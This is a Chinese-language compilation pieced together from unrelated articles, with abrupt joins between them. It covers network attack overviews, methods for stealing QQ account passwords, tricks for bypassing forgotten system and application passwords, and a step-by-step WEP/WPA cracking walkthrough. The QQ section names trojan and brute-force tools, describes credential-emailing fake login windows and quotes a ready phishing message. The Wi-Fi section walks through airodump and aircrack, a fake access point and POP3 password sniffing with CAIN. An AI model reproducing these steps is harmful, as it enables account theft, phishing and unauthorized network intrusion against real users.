    概览:DNS协议不对转换或信息性的更新进行身份认证,这使得该协议被人以一些不同的方式加以利用。如果你维护着一台公共的DNS服务器,黑客只需实施一次域转换操作就能得到你所有主机的名称以及内部IP地址。

   防御:在防火墙处过滤掉域转换请求。

    Finger服务

    概览:黑客使用finger命令来刺探一台finger服务器以获取关于该系统的用户的信息。

    防御:关闭finger服务并记录尝试连接该服务的对方IP地址,或者在防火墙上进行过滤。

    LDAP服务

    概览:黑客使用LDAP协议窥探网络内部的系统和它们的用户的信息。

    防御:对于刺探内部网络的LDAP进行阻断并记录,如果在公共机器上提供LDAP服务,那么应把LDAP服务器放入DMZ。

    4、假消息攻击

    用于攻击目标配置不正确的消息,主要包括:DNS高速缓存污染、伪造电子邮件。

    DNS高速缓存污染

    概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以将不正确的信息掺进来并把用户引向黑客自己的主机。

    防御:在防火墙上过滤入站的DNS更新,外部DNS服务器不应能更改你的内部服务器对内部机器的认识。

    伪造电子邮件

    概览:由于SMTP并不对邮件的发送者的身份进行鉴定,因此黑客可以对你的内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附带上可安装的特洛伊木马程序,或者是一个引向恶意网站的连接。

    防御:使用PGP等安全工具并安装电子邮件证书。

“远程破解”与“本地破解”正好相反,是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。

1、在线密码破解

大家知道QQ可以利用代理服务器登录,这是一种保护措施。它不仅可以隐藏用户的真实IP地址,以避免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。

在线密码破解和本地密码破解采用的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,就可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码!

在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它仍然采用穷举法技术,所以在枚举密钥位数长度以及类型时,校验时间很长,破解效率不高。同样,这种方法还受到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。

目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步:第一步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第二步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻找QQ代理服务器麻烦,可以使用一些现代的QQ代理公布软件);第三步,点击“添加&测试”按钮,软件先自动检测此服务器是否正常,确定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动筛选不可用或者速度慢的服务器);第四步,点击“开始”按钮,开始在线密码破解……

2、登录窗口破解

伪造QQ登录窗口的盗号方法非常简单,这是一种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成一个伪装的QQ主程序,它运行后会出现跟腾讯QQ一模一样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以一款叫“狐Q”的软件为例,首次运行它时,它会把自身复制到QQ目录中,并把原来的QQ.exe文件改名为QQ.com(这样的更改不会影响QQ的正常运行)。设置完毕后,“狐Q”的原程序就会消失,伪装成QQ等待“猎物”上钩……在其软件设置中,有一项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那么用户第一次运行的是真QQ了,也就是说在第三次运行时,用户的QQ号便被盗了!在QQ密码发送的过程中,如果发送失败,它还会把QQ号和密码记下来,等待下一次发送。

即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几乎可以捕获Windows下所有标准密码框中的密码,如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后,它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”,它几乎可以捕获Windows 9x/2000/XP下所有登录窗口中的密码,并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时,只须填上用于接收别人QQ密码的邮箱地址及保护密码,并把生成的盗号器文件传过去哄骗别人运行,然后就可以坐等密码上门!此软件与传统的键盘记录器不同,它在电脑每次开机时隐藏自启动,不管密码是用键盘输入的,还是复制、粘贴的,都能够有效地实时拦截!其注册版本居然还带有自动升级的功能,破坏力十分巨大。

3、邮箱破解

利用邮箱盗取QQ密码也是一种比较常用的方法。我们都知道,腾讯公司在对用户的QQ号码进行验证时需要用户填写电子邮箱。对于申请了“密码保护”功能的用户,在腾讯主页上找回遗忘的密码时,密码会被发送到用户注册时的邮箱中。所以,只要盗号者破解了对方的电子邮箱,就有机会得到其QQ密码!通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱,具体的操作方法有多种,由于它有点超出文本的范畴,所以大家可以自己上网查询相关资料,在此就不赘述了。

4、消息诈骗

孔子曰:上士杀人用笔端,中士杀人用语言,下士杀人用石盘。远程盗取QQ密码还有一种大家最常见也是最简单最有效的方法,那就是利用不少人爱贪小便宜的弱点,进行人为的欺骗!

标题:腾讯关于xxxxx获奖通知

“QQ幸运儿:恭喜!!!您已经成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件,并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注:奖品是以邮寄方式寄出,请您认真填写以下资料。如果填写错误,将被作为自动放弃获奖机会处理。> > QQ号码:> 密码:> 姓名:> E-mail地址:> 身份证号码:> 通讯地址:> 联系电话:> 邮编:”

比如我们的QQ经常会收到如下的陌生人消息。

如果你真的如实填写这些资料并傻傻的发送回去,不一会儿QQ密码就被盗了。

还有类似这样的消息:“亲爱的***号QQ用户,恭喜你你已经成为腾讯的幸运号码,腾讯公司送你QQ靓号:12345,密码:54321。请尽快登陆并修改密码,感谢您对腾讯公司的支持!”不少人一看,以为白捡的便宜来了 ,登录一试还是真的,于是就大大咧咧地笑纳了。但是,很多人为了方便,不管什么东西都爱使用相同的密码,所以当这个QQ号的密码被你改为与自己QQ号相同的密码时,自己QQ号的连同这个赠送的QQ号都得玩完!这是因为,赠送的QQ号已被盗号者申请过密码保护,当你更改密码后他就利用腾讯的密码保护功能把它收了回去,同时也收走你的QQ密码。如果你的QQ没有申请过密码保护,此刻就只能和它永别了。

5、更多的木马破解

“古希腊大军围攻特洛伊城,久攻不破,遂造一大木马藏匿将士于其中,大部队假装撤退而弃木马。城中得知敌退,将木马作战利品拖入城内。午夜时分,匿于木马中的将士开启城门四处纵火,城外伏兵涌入,里应外合,焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事,其中那只木马被黑客程序借用其名,表“一经潜入,后患无穷”之意。一个完整的木马程序由服务器端和控制端组成。所谓“中了木马”,是指用户的电脑中被安装了木马的服务器端,而拥有控制端的盗号者就通过网络远程控制该电脑,从而轻而易举地盗得该缒灾械腝Q密码。

针对QQ的木马程序多不胜数,其中专门盗取QQ密码的也有一大堆,它们被偷偷地安装在用户的电脑中,随电脑启动而自动运行,如果用户使用QQ,那么其账号和密码就会被这些木马记录下来,并发送到木马安装者的邮箱中。前面已经介绍了两款通过登录窗口盗号的QQ木马,下面再介绍两款典型的。

第一款:极品QQ盗号2004

这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多,先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题,然后把生成的盗号器偷偷地安装到别人的电脑里……这个木马声称可以避过主流的杀毒软件,盗取QQ最新版本的密码,即QQ2004和QQ2004奥运特别版的密码。

第二款:QQ间谍3.0

使用此木马软件时,点击工具条上的“服务端”,按照提示生成服务端程序,然后把它偷偷地传到别人的电脑中,当受害者不小心运行了它,木马就被种上了。这个木马不仅可以盗号,还能悄悄地在后台记录受害者的QQ聊天信息,并下载可执行文件实现远程升级和远程执行脚本程序。另外再注册之后,它还可以直接远程监控对方电脑上的QQ聊天记录。

利用木马软件盗取QQ密码,显然比用前面介绍的那些破解方法更有效率!不仅节省时间,而且成功率也高。但是,如何把木马程序的服务器端安装在用户的电脑中,这是一个费心思的事儿。另外,很多功能强大的木马程序都是需要花钱注册,才能使用其全部功能。因此,对于那些水平参差不齐的盗号者而言,要想玩转木马程序,还得费点劲。

    在日常操作中,我们经常要输入各种各样的密码,例如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这些密码,就有可能用不了机器、打不开文件、不能聊天……也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码的破解方法,希望能解你燃眉之急。

    一、遗忘了SYSTEM密码

    如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了, 解决的办法只能是:打开机箱,把电池取下、正负极短接,给CMOS放电,清除CMOS中的所有内容(当然也就包括密码)。然后,重新开机进行设置。

    注意:有些主板设置了CMOS密码清除跳线,请参照主板说明书将该跳线短接,这样也可以清除CMOS密码。

    二、遗忘了SETUP密码

    遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG,然后输入如下命令手工清除SETUP密码:

_ o 70 16
_ o 71 16
_ q
 

    你也可以用CMOS密码破解软件来显示CMOS密码。这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS。在DOS下启动该程序,CMOS密码就会显示出来。

    三、遗忘了Windows登录密码

    WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows安装目录下的*.PWL密码文件,以及Profiles子目录下的所有个人信息文件。重新启动Windows后,系统会弹出一个不包含任何用户名的密码设置框,此时无需输入任何内容,直接单击“确定”,登录密码即被删除。

    另外,将注册表数据库HKEY_LOCAL_MACHINENetworkLogon 分支下的UserProfiles修改为“0”,然后重新启动Windows也可达到同样目的。

    WinXP/2000下对策:删除系统安装目录system32config下的SAM文件,重新启动,此时管理员Administrator账号已经没有密码了,用Administrator帐户登陆系统,不用输入任何密码,进入系统后再重新设置登陆帐户密码即可。

    四、遗忘了Windows屏保密码

    解决方法:在开机后按F8键,选择安全模式启动,进入Windows 后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕 保护,取消“密码保护”即可。

    五、遗忘了Windows电源管理密码

   Windows的电源管理功能也可以设置密码,启用此功能后,当系统从节能状态返回时就会要求输入密码。

    如果你遗忘了该密码,可以使用前面破解Windows登录密码的那种方法去破解。

    六、遗忘了微软Office密码

    解决方法:使用破解Office系列文档密码的软件,这样的软件有很多,例如AOPR,该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行搜索。

    七、遗忘了WinZip压缩包密码

    解决方法:用软件UZPC(Ultra Zip Password Cracker),找回丢失的密码。使用该软件时要先设置适当的解密方式,例如“后门方式”、“穷举方式”、“字典方式”和“ 模式匹配方式”等,一般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试,直至找出最后的结果。

    八、遗忘了RAR压缩包密码

    遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARK RAR压缩包文件名”命令,利用缺省参数即可进行破解。

    九、遗忘了QQ/ICQ密码

    为保护QQ密码,你应该赶快到这里申请密码保护。假如你忘记了QQ密码、或者密码被盗时,只需填写正确的信息即可取回。

    如果你要找回ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久违”的ICQ密码。

    十、遗忘了OE密码

    如果你忘了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:重启计算机并按F8,选择“安全模式”,再启动OE就不需要密码了,然后你可以重建一个用户(不能修改密码),把信息导入新用户信箱即可。

    十一、遗忘了Foxmail帐户密码

    解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新建一个帐户(帐户名任意,例如lacl1),然后退出Foxmail,运行Windows资源管理器,找到FoxmailMAILlacl1文件夹,里边有个“account.stg”,把它复制到忘记密码的帐户(例如“lacl”)目录中,直接覆盖原来的“account.stg”文件。再重新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐户中原来的邮件一封都不会少!

    十二、查看“*”密码

    许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到密码的原始字符,如果你使用专门破解“*”密码的软件,即可查出这些密码的原始字符。

    这样的软件有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用Password Spectator Pro 。使用时,只需先打开显示“*”的窗口,启动这类软件,然后按住Ctrl键,在密码栏中按下鼠标左键,这些“*”密码的原始字符就会显示出来了。

  最近,有媒体报道了无线局域网安全漏洞曝光的情况。在9月11日下午举行的无线局域网安全技术研讨会上,演示人员对迅驰笔记本电脑进行了安全测试,利用从网上下载的工具5分钟内破解了保护口令。在快速破解了迅驰无线网络密钥后,轻松连接到加密的无线局域网中,可获取合法用户的各种机密信息、电子邮件等,也能删除私密的文件、邮件,甚至传播电脑病毒。这一消息引起了广大网友的关注,究竟如何破解?相关专家发来一份整理出来的《迅驰密钥破解法》,详细介绍了破解的方法。

  1、破解软件简介

  WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。

  2、实验环境系统组成

  2.1 硬件环境

  选用具有WEP和WPA加密功能的无线路由器或AP一台

  带有迅驰无线网卡的笔记本电脑两台(分别定义为STA1和STA2,作为合法无线接入用户)

  抓包无线网卡一块

  ü笔记本电脑一台(定义为STA3,作为入侵者)

  2.2 软件环境

  入侵者STA3 :WinAirCrackPack工具包,

  注意:STA3要开启在控制面板->管理工具->服务中开启Wireless Zero Config服务。

  3、实验拓扑图

  4、配置无线路由器(根据实际网络环境进行配置)

  (1)STA1连接上无线路由器(默认未加密)。右键单击屏幕下的 图标,选择“查看可用的无线网络”,弹出如图1所示的窗口。

  其中显示有多个可用的无线网络,双击TP-LINK连接无线路由器,一会儿就连接成功。

  (2)打开IE浏览器,输入IP地址:192.168.1.1(无线路由器默认局域网IP地址)。

  (3)登录无线路由器管理界面(用户名:admin,密码:admin)。

  单击界面左侧的“网络参数”下的“LAN口设置”选项,设置“IP地址”为192.168.1.8并保存,如图4所示。

  (4)打开IE浏览器,输入IP地址:192.168.1.8,重新登录无线路由器管理界面(注意本实验选择TP-LINK无线路由器,其他品牌产品如CISCO等均有类似配置选项),单击界面左侧的“无线设置”下的“基本设置”选项。

  1)选择“模式”为“54Mbps(802.11g)”;

  2)选择“密钥格式”为“ASCII码”;

  3)选择“密钥类型”为“64位”;

  4)设置“密钥1”为“pjwep”;

  5)单击“保存”。

  (5)当无线路由器设置好WEP密钥后,STA1需要重新连接上无线路由器(输入的密钥与无线路由器设置的密钥相同),一会儿就连接成功。

  (6)打开IE浏览器,输入IP地址:192.168.1.8,重新登录无线路由器管理界面,单击界面左侧的“DHCP服务器”下的“DHCP服务”选项,单击“不启用”并保存,如图8所示,单击“系统工具”下的“重启路由器”对路由器进行重启。

  5、破解WEP、WPA密钥的软件下载

  STA3从网上下载用于破解密钥的软件,具体操作步骤如下:

  (1)在Google搜索页面中输入“WinAircrackPack下载”进行搜索,如图9所示。

  点击上述页面中“安全焦点:安全工具-WinAircrackPack.zip”,弹出以下页面。

  (2)单击“下载”保存该软件,可解压到本地磁盘的任何位置(以下我们解压到E盘根目录下为例)。

  6、安装抓包无线网卡

  注:用于抓包无线网卡的驱动采用Atheros v4.2.1(可从www.wildpackets.com/support/downloads/driver_download/1下载),该卡必须采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组,下表的网卡均可使用,本实验我们采用Netgear 的108M无线网卡(型号:WG511T)。

  (1)在STA3笔记本上安装抓包无线网卡驱动。插入无线网卡,弹出如图11所示的窗口。选择“否,暂时不”,单击“下一步”。

  (2) 选择“从列表或指定位置安装”,单击“下一步”。

  (3)选择“不要搜索”,单击“下一步”。

  (4)单击“从磁盘安装”,在弹出的窗口中单击“浏览”,选择E:WinAircrackPackatheros421@(注:atheros421@可以从www.wildpackets.com/support/downloads/driver_download/1下载)目录下的net5211文件,单击“打开”,然后单击“确定”,单击“下一步”,在安装的过程中弹出如图15所示的窗口。

  7、破解WEP密钥

  (1)让STA1和STA2重新连接上无线路由器。

  (2)在STA3笔记本电脑上运行airodump,该工具用来捕获数据包,按提示依次选择“16”:破解所用无线网卡的序号;

  “a”,选择芯片类型,这里选择atheros芯片;

  “6”,信道号,一般1、6、11是常用的信道号,选择“0”可以收集全部信道信息;

  “testwep”(该输入文件名可任意);

  “y”,破解WEP时候选择“y”,破解WPA时选择“n”。

  (3)回车后,进入以下界面。

  (4)当该AP的通信数据流量极度频繁(比如可以采用STA1与STA2对拷文件来产生数据流量),“Packets”所对应的数值增长速度就会越大。当大概抓到30万(如采用104位RC4加密需要抓到100万包)“Packets”时关闭airodump窗口,启动WinAircrack。

  (5)点击左侧的“General”进行设置,选择加密类型为“WEP”,添加捕获的文件(testwep.ivs)。

  (6)点击左侧的“Advanced”进行设置,选择“Aircrack”所在的位置。

  (7)全部设置完后,点击右下角的“Aircrack the key”按钮弹出以下窗口。

  (8)选择要破解网络的BSSID(本实验选择“1”),回车得到最终WEP密钥。。

  8、破解WPA密钥

  (1)修改无线路由器的加密类型和加密方法,并设置为WPA-PSK认证和TKIP加密方式。

  (2)在STA3笔记本上运行airodump,该工具用来捕获数据包,按提示依次选择“16”,“a”,“6”,“testwpa”(该输入文件名可任意),“n”。

  (3)回车后,进入以下界面

  (4)让STA1重新连接上无线路由器,airodump将捕获一个无线路由器与STA1四次握手的过程。

  (5)启动WinAircrack。

  (6)点击左侧的“General”进行设置,选择加密类型为“WPA-PSK”,添加捕获的文件(testwpa.cap)。

  (7)点击左侧的“Wpa”进行设置,选择一个字典文件(口令字典可下载:例如lastbit.com/dict.asp)。

  (8)全部设置完后,点击右下角的“Aircrack the key”按钮弹出以下窗口,可知已经捕获到一次握手的过程。

  (9)选择要破解网络的BSSID(本实验选择“2”),回车后经过几分钟的计算,最终得到WPA密钥。

  9、破解密钥后对网络的危害一例(伪造AP)

  一旦入侵者知道了无线网络的WEP或WPA密钥,就可以连接到本地局域网内,这样入侵者就享有与正常接入用户一样对整个网络访问的权限,进行深度攻击。入侵者可以利用IPBOOK(www.skycn.com/soft/11014.html)、SuperScan(www.skycn.com/soft/8061.html)等类似这样的工具扫描局域网内的计算机,计算机里面的文件、目录、或者整个的硬盘驱动器能够被复制或删除,甚至其他更坏的情况诸如键盘记录、特洛伊木马、间谍程序或其他的恶意程序等等能够被安装到你的系统中,这样后果是非常严重的。

  (1)简介

  当WEP或WPA密码被破解后,入侵者可能用该密码和其他无线接入点(AP)构造一个假网络,当伪装AP的信号强于正常AP或用户靠近伪装AP时,正常用户会很自然的接入到该假网络中,对于用户本身来说是感觉不到该网络的,就在用户正常收发邮件时,我们可以用类似CAIN( www.ttian.net/website/2005/0908/458.html)这样的工具进行POP3、telnet等口令的破解等攻击。

  (2)POP3口令破解

  1)打开CAIN。

  2)点击菜单栏“Configure”弹出以下窗口。

  3)选择一个将用于抓包的网络适配器,点击“确定”,选择“ ”和“ ”,然后点击“ ”开始监控抓包。

  4)正常用户开始收邮件,该软件可以对邮箱的登陆名和密码进行捕获。

  (3)被破解后的危害

  当黑客窃取了你的邮箱的用户名、密码、POP3服务器和SMTP服务器的IP地址后,就可以直接访问你的邮箱,你的邮件信息将完全暴露在黑客面前。

附件:winaircrackpack.zip(1906565 Byte)